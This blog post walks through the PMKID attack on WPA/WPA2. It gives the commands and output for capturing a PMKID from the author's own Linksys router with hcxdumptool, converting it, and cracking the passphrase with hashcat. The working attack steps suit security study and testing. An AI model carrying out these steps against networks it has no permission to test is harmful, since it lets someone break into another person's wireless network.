Adam Toscher
4 min readAug 6, 2018

New attack on WPA/WPA2 using PMKID

In this short blog, I will walk you through the process of obtaining a valid PMKID packet, and converting those frames of data to hashcat format for cracking. This is a new way to recover the WPA2-PSK passphrases from vulnerable devices, that doesn’t require station <->client interaction or a 4-way handshake.

Checklist:

Linux — Debian

# uname -ar
Linux ubuntu 4.13.0-46-generic #51-Ubuntu SMP Tue Jun 12 12:36:29 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Supported adapters (strict)

USB ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter
USB ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter
USB ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter
USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter

Out of all the cards mentioned, in my preliminary testing I found the older AWUS036H card I bought in 2012 to work the best.

AWUS036H

Both Alfa USB devices work well. Preliminary results show better performance, with the AWUS036H . I was able to obtain multiple PKMID frames within seconds sometimes from a vulnerable access point . The older Alfa AWUS036H is a also a more powerful card and works better with nosier conditions.

root@ubuntu:~# lsusb
--- snip ---
Bus 003 Device 016: ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter

--- snip ---

Vulnerable Linksys E4200 router with WPA2-PSK authentication enabled

Seven year old home router from 2011
Wireless Settings

Walk-through:

# ip link set wlx00c0ca59f4b2 down# iw dev wlx00c0ca59f4b2 set type monitor# rfkill unblock all# ip link set wlx00c0ca59f4b2 up./hcxdumptool -i wlx00c0ca694df2 --enable_status -c 6 -o E4200-WPA2PSK.pcapng--
[15:18:14 - 006] c0c1c04bfc68 -> e4209b5662d3 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 3605]
[15:18:16 - 006] c0c1c04bfc68 -> fcc2330136c6 [FOUND PMKID]
--
# ./hcxpcaptool -z E4200-WPA2PSK.16800 E4200-WPA2PSK.pcapng
start reading from E4200-WPA2PSK.pcapng

summary:
--------
file name....................: E4200-WPA2PSK.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.13.0-46-generic
file application information.: hcxdumptool 4.2.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
file os information..........: Linux 4.13.0-46-generic
file application information.: hcxdumptool 4.2.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 129
skipped packets..............: 0
packets with FCS.............: 67
beacons (with ESSID inside)..: 2
probe requests...............: 2
probe responses..............: 4
association requests.........: 13
association responses........: 26
authentications (OPEN SYSTEM): 70
authentications (BROADCOM)...: 14
EAPOL packets................: 12
EAPOL PMKIDs.................: 1
best handshakes..............: 1 (ap-less: 0)
1 PMKID(s) written to E4200-WPA2PSK.16800
# cat E4200-WPA2PSK.16800
b0b606458a7945cf7c80b7fefe390506*c0c1c04bfc68*fcc2330136c6*436973636f3136383934

Details to be noted:

Ensure you specify the correct channel when passing that value to “-c” to the Access Point you are targeting.

4. Hashchat

We can download the newly updated https://hashcat.net/hashcat/ V4.2.0 which cracks two new hash types:

  • WPA-PMKID-PBKDF2
  • WPA-PMKID-PMK

The files have been copied to a windows host and “cracked” below for illustration purposes only. Since it’s a single hex encoded string, it’s much easier to copy and mange between different hosts.

c:\Users\Adam\Downloads\hashcat-4.2.0>hashcat64.exe -m 16800 E4200-WPA2PSK.16800 wordlist.txthashcat (v4.2.0) starting…
======================================
* Device #1: GeForce GTX 1080, 2048/8192 MB allocatable, 20MCU
OpenCL Platform #2: Intel(R) Corporation
========================================
* Device #2: Intel(R) Core(TM) i7–6800K CPU @ 3.40GHz, skipped.
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP
Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63
Watchdog: Temperature abort trigger set to 90cDictionary cache built:
* Filename..: wordlist.txt
* Passwords.: 3
* Bytes…..: 29
* Keyspace..: 3
* Runtime…: 0 secs
The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework
Approaching final keyspace — workload adjusted.b0b606458a7945cf7c80b7fefe390506*c0c1c04bfc68*fcc2330136c6*436973636f3136383934:testpassw0rdSession……….: hashcat
Status………..: Cracked
Hash.Type……..: WPA-PMKID-PBKDF2
Hash.Target……: b0b606458a7945cf7c80b7fefe390506*c0c1c04bfc68*fcc23…383934
Time.Started…..: Mon Aug 06 18:32:57 2018 (0 secs)
Time.Estimated…: Mon Aug 06 18:32:57 2018 (0 secs)
Guess.Base…….: File (wordlist.txt)
Guess.Queue……: 1/1 (100.00%)
Speed.Dev.#1…..: 44 H/s (0.10ms) @ Accel:32 Loops:16 Thr:1024 Vec:1
Recovered……..: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress………: 3/3 (100.00%)
Rejected………: 1/3 (33.33%)
Restore.Point….: 0/3 (0.00%)
Candidates.#1….: passw0rd -> testpassw0rd
HWMon.Dev.#1…..: Temp: 44c Fan: 28% Util: 31% Core:1771MHz Mem:4513MHz Bus:16
Started: Mon Aug 06 18:32:54 2018
Stopped: Mon Aug 06 18:32:58 2018
c:\Users\Adam\Downloads\hashcat-4.2.0>type hashcat.potfile
b0b606458a7945cf7c80b7fefe390506*c0c1c04bfc68*fcc2330136c6*436973636f3136383934:testpassw0rd
Adam Toscher
Adam Toscher

Written by Adam Toscher

Adam is a offensive security engineer and red team operator with over 20 years of experience in IT